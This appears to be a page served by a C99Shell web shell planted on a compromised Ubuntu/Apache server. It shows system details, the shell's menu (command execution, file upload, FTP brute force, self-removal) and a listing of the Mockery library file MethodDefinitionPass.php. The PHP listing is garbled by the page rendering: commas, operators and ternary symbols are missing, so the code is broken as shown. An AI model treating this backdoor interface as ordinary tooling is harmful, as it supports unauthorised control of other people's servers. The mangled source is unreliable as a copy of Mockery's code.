!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/mockery/mockery/library/Mockery/Generator/StringManipulation/Pass/   drwxrwxrwx
Free 13.08 GB of 57.97 GB (22.57%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     MethodDefinitionPass.php (5.16 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Mockery
 *
 * LICENSE
 *
 * This source file is subject to the new BSD license that is bundled
 * with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://github.com/padraic/mockery/blob/master/LICENSE
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to padraic@php.net so we can send you a copy immediately.
 *
 * @category   Mockery
 * @package    Mockery
 * @copyright  Copyright (c) 2010 Pádraic Brady (http://blog.astrumfutura.com)
 * @license    http://github.com/padraic/mockery/blob/master/LICENSE New BSD License
 */

namespace Mockery\Generator\StringManipulation\Pass;

use 
Mockery\Generator\Method;
use 
Mockery\Generator\Parameter;
use 
Mockery\Generator\MockConfiguration;

class 
MethodDefinitionPass implements Pass
{
    public function 
apply($codeMockConfiguration $config)
    {
        foreach (
$config->getMethodsToMock() as $method) {
            if (
$method->isPublic()) {
                
$methodDef 'public';
            } elseif (
$method->isProtected()) {
                
$methodDef 'protected';
            } else {
                
$methodDef 'private';
            }

            if (
$method->isStatic()) {
                
$methodDef .= ' static';
            }

            
$methodDef .= ' function ';
            
$methodDef .= $method->returnsReference() ? ' & ' '';
            
$methodDef .= $method->getName();
            
$methodDef .= $this->renderParams($method$config);
            
$methodDef .= $this->renderReturnType($method);
            
$methodDef .= $this->renderMethodBody($method$config);

            
$code $this->appendToClass($code$methodDef);
        }

        return 
$code;
    }

    protected function 
renderParams(Method $method$config)
    {
        
$class $method->getDeclaringClass();
        if (
$class->isInternal()) {
            
$overrides $config->getParameterOverrides();

            if (isset(
$overrides[strtolower($class->getName())][$method->getName()])) {
                return 
'(' implode(','$overrides[strtolower($class->getName())][$method->getName()]) . ')';
            }
        }

        
$methodParams = array();
        
$params $method->getParameters();
        foreach (
$params as $param) {
            
$paramDef $this->renderTypeHint($param);
            
$paramDef .= $param->isPassedByReference() ? '&' '';
            
$paramDef .= $param->isVariadic() ? '...' '';
            
$paramDef .= '$' $param->getName();

            if (!
$param->isVariadic()) {
                if (
false !== $param->isDefaultValueAvailable()) {
                    
$paramDef .= ' = ' var_export($param->getDefaultValue(), true);
                } elseif (
$param->isOptional()) {
                    
$paramDef .= ' = null';
                }
            }

            
$methodParams[] = $paramDef;
        }
        return 
'(' implode(', '$methodParams) . ')';
    }

    protected function 
renderReturnType(Method $method)
    {
        
$type $method->getReturnType();

        return 
$type sprintf(': %s'$type) : '';
    }

    protected function 
appendToClass($class$code)
    {
        
$lastBrace strrpos($class"}");
        
$class substr($class0$lastBrace) . $code "\n    }\n";
        return 
$class;
    }

    protected function 
renderTypeHint(Parameter $param)
    {
        
$typeHint $param->getTypeHint();

        return 
$typeHint === null '' sprintf('%s '$typeHint);
    }

    private function 
renderMethodBody($method$config)
    {
        
$invoke $method->isStatic() ? 'static::_mockery_handleStaticMethodCall' '$this->_mockery_handleMethodCall';
        
$body = <<<BODY
{
\$argc = func_num_args();
\$argv = func_get_args();

BODY;

        
// Fix up known parameters by reference - used func_get_args() above
        // in case more parameters are passed in than the function definition
        // says - eg varargs.
        
$class $method->getDeclaringClass();
        
$class_name strtolower($class->getName());
        
$overrides $config->getParameterOverrides();
        if (isset(
$overrides[$class_name][$method->getName()])) {
            
$params array_values($overrides[$class_name][$method->getName()]);
            
$paramCount count($params);
            for (
$i 0$i $paramCount; ++$i) {
                
$param $params[$i];
                if (
strpos($param'&') !== false) {
                    
$body .= <<<BODY
if (\$argc > $i) {
    \$argv[
$i] = {$param};
}

BODY;
                }
            }
        } else {
            
$params array_values($method->getParameters());
            
$paramCount count($params);
            for (
$i 0$i $paramCount; ++$i) {
                
$param $params[$i];
                if (!
$param->isPassedByReference()) {
                    continue;
                }
                
$body .= <<<BODY
if (\$argc > $i) {
    \$argv[
$i] =& \${$param->getName()};
}

BODY;
            }
        }

        
$body .= "\$ret = {$invoke}(__FUNCTION__, \$argv);\n";

        if (
$method->getReturnType() !== "void") {
            
$body .= "return \$ret;\n";
        }

        
$body .= "}\n";
        return 
$body;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--